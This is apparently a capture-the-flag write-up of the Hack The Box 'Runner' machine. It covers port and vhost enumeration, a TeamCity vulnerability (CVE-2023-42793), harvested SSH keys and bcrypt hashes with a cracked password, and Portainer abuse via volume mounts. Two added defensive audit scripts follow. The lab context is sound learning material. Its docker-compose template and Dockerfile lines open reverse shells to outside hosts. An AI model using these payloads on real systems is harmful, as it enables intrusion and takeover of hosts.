Recon
nmap
$nmap -A runner.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 08:18 UTC
Nmap scan report for runner.htb (10.129.182.43)
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirbuster
ffuf
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://FUZZ.runner.htb' -fc 302 -t 200
This does not give any results.
port 8000
It hosts NSCA (Nagios Service Check Acceptor), a Nagios addon.
https://answerhub.nagios.com/support/s/article/Using-the-NSCA-Addon-8b43111e
https://support.nagios.com/kb/article/nsca-overview-78.html
It is one of the products of Nagios, a system monitoring solutions firm.
https://www.nagios.com/products/
It only receives input from monitoring services, and after some further research it seems like a dead end.
gobuster
Running gobuster with the larger n0kovo subdomains list in vhost enumeration mode finally gives us some results.
$gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://runner.htb --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://runner.htb
[+] Method: GET
[+] Threads: 150
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: teamcity.runner.htb Status: 401 [Size: 66]
CVE-2023-42793
https://www.exploit-db.com/exploits/51884
We are finally logged in somewhere.
TeamCity
In TeamCity, we can create a new project with build steps. As with Jenkins, this can be used to get a reverse shell.
Or that would be the case, if we couldn't just go to the admin panel and see all users, including admin.
We can also get a backup of everything…
… and instead of searching in the GUI, we can just find the SSH keys.
ssh -i ./id_rsa john@runner.htb
allows us to log in as john and get the user flag.
Priv Esc
LinEnum
LinEnum returns nothing, as usual.
Portainer
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN -
tcp 0 76 10.129.182.43:22 10.10.14.81:42262 ESTABLISHED -
tcp 0 0 127.0.0.1:54050 127.0.0.1:9000 TIME_WAIT -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8000 :::* LISTEN -
john@runner:/tmp$ ls /data
bin certs chisel compose docker_config portainer.db portainer.key portainer.pub teamcity_server tls
Using SSH tunneling (ssh -i ./id_rsa -L 8082:localhost:9000 john@runner.htb), we can see that port 9000 is Portainer, unfortunately behind a password.
Port 8111 is TeamCity.
In the backup we can also find the users file, with passwords hashed with bcrypt.
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$cQmbW7GA2NePss1vKY8RleSQ8kPMiU6av/N5m00mFHthv69NBBXOW, John, john@runner.htb, 1723627560076, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_adminq8dt, $2a$07$WJrTewhBjMRJGvEil6mxROo8RWeFimky0wPZt3pRvVgICHP61NlqG, , angry-admin@funnybunny.org, 1723628900193, BCRYPT
Using john we get the password for matthew, which is piper123.
We can use it to log into Portainer.
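An added audit script, not part of the writeup, that reads the user export above the way a defender would: it parses the rows, extracts the bcrypt work factor (all three hashes use cost 7, which is what makes offline cracking cheap), flags accounts whose mail domain is not the organisation's, and converts the last-login timestamps to dates. The cost floor of 10 and the runner.htb domain allowlist are assumptions.

```python
import csv
import re
from datetime import datetime, timezone

# Constructed sample: the rows of the TeamCity users export quoted above.
USERS_EXPORT = """\
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$cQmbW7GA2NePss1vKY8RleSQ8kPMiU6av/N5m00mFHthv69NBBXOW, John, john@runner.htb, 1723627560076, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_adminq8dt, $2a$07$WJrTewhBjMRJGvEil6mxROo8RWeFimky0wPZt3pRvVgICHP61NlqG, , angry-admin@funnybunny.org, 1723628900193, BCRYPT
"""

BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$")
MIN_COST = 10                     # assumed policy floor; the export uses cost 7
TRUSTED_DOMAINS = {"runner.htb"}  # assumed: the organisation's own mail domain


def bcrypt_cost(hash_value):
    """Return the bcrypt work factor encoded in the hash, or None if not bcrypt."""
    m = BCRYPT_RE.match(hash_value)
    return int(m.group(1)) if m else None


def audit_users(export_text):
    """Parse the export and return one finding dict per user that has any issue."""
    rows = csv.DictReader(export_text.splitlines(), skipinitialspace=True)
    findings = []
    for row in rows:
        issues = []
        cost = bcrypt_cost(row["PASSWORD"])
        if cost is None:
            issues.append("password hash is not bcrypt")
        elif cost < MIN_COST:
            issues.append(f"bcrypt cost {cost} below {MIN_COST}; cheap to crack offline")
        domain = row["EMAIL"].rsplit("@", 1)[-1].lower()
        if domain not in TRUSTED_DOMAINS:
            issues.append(f"email domain {domain} is outside the organisation")
        if not row["NAME"].strip():
            issues.append("no display name set")
        last_login = datetime.fromtimestamp(
            int(row["LAST_LOGIN_TIMESTAMP"]) / 1000, tz=timezone.utc)
        if issues:
            findings.append({"user": row["USERNAME"], "cost": cost,
                             "last_login": last_login.strftime("%Y-%m-%d"),
                             "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_users(USERS_EXPORT):
        print(f["user"], f["last_login"], "; ".join(f["issues"]))
```

Note that the admin and city_adminq8dt logins fall on the same day as the scan above, which is the kind of correlation a reviewer of this export would look for.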
yaml
In custom templates, we can create our own reverse shell template:
version: '3.8'
services:
  shell_reverse:
    image: alpine:latest
    container_name: shell_reverse
    command: sh -c "sh -i >& /dev/udp/10.10.14.81/4242 0>&1"
    restart: unless-stopped
But then we learn that deploying the stack is reserved for admin users.
Creating a Dockerfile
We can try to create a malicious Dockerfile and upload it manually.
mkdir shell_reverse
cd shell_reverse
touch Dockerfile
echo 'FROM alpine:latest' > Dockerfile
# append, so the FROM line written above is not overwritten
echo 'CMD sh -c "sh -i >& /dev/udp/10.0.0.1/4242 0>&1"' >> Dockerfile
docker build -t shell_reverse .
But we can't deploy anything that is not from docker.io.
Getting the flag with a volume
We have to create a volume:
Then we have to attach it to a new container, for example a TeamCity one.
After connecting to the container as root, we can see the root flag in /mnt.
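An added example, not from the writeup, of the check a defender would run against the host after this step: it reads docker inspect output and flags containers that run privileged or bind a sensitive host directory into the container, which is what makes the root flag readable from /mnt. The inspect JSON is constructed, the list of sensitive host paths is assumed, and the sample assumes the attached volume was backed by the host's /root directory.

```python
import json

# Constructed sample in the shape of `docker inspect` output: a TeamCity server
# with its ordinary data volume, and a second container with a host path at /mnt.
INSPECT_JSON = json.dumps([
    {"Name": "/teamcity_server",
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Name": "teamcity_data",
                 "Source": "/var/lib/docker/volumes/teamcity_data/_data",
                 "Destination": "/data/teamcity_server", "RW": True}]},
    {"Name": "/teamcity_copy",
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/root",
                 "Destination": "/mnt", "RW": True}]},
])

# Host directories that a workload container should never be able to reach
# (assumed list; adjust to the host's layout).
SENSITIVE_PREFIXES = ("/", "/root", "/etc", "/home", "/var/run/docker.sock")


def exposes_host(source):
    """True if a bind source is, or sits under, a sensitive host path."""
    source = source.rstrip("/") or "/"
    for prefix in SENSITIVE_PREFIXES:
        p = prefix.rstrip("/") or "/"
        if source == p or (p != "/" and source.startswith(p + "/")):
            return True
    return False


def audit_containers(inspect_text):
    """Return (container, reason) pairs for privileged mode or risky bind mounts."""
    findings = []
    for c in json.loads(inspect_text):
        name = c["Name"].lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "runs privileged"))
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and exposes_host(m.get("Source", "")):
                mode = "rw" if m.get("RW", True) else "ro"
                findings.append((name, f"host {m['Source']} bound at {m['Destination']} ({mode})"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_containers(INSPECT_JSON):
        print(f"{name}: {reason}")
```

Run it as `docker inspect $(docker ps -q) | python3 audit.py` after replacing INSPECT_JSON with stdin; the named-volume mount of the real TeamCity container is not flagged, only the host bind is.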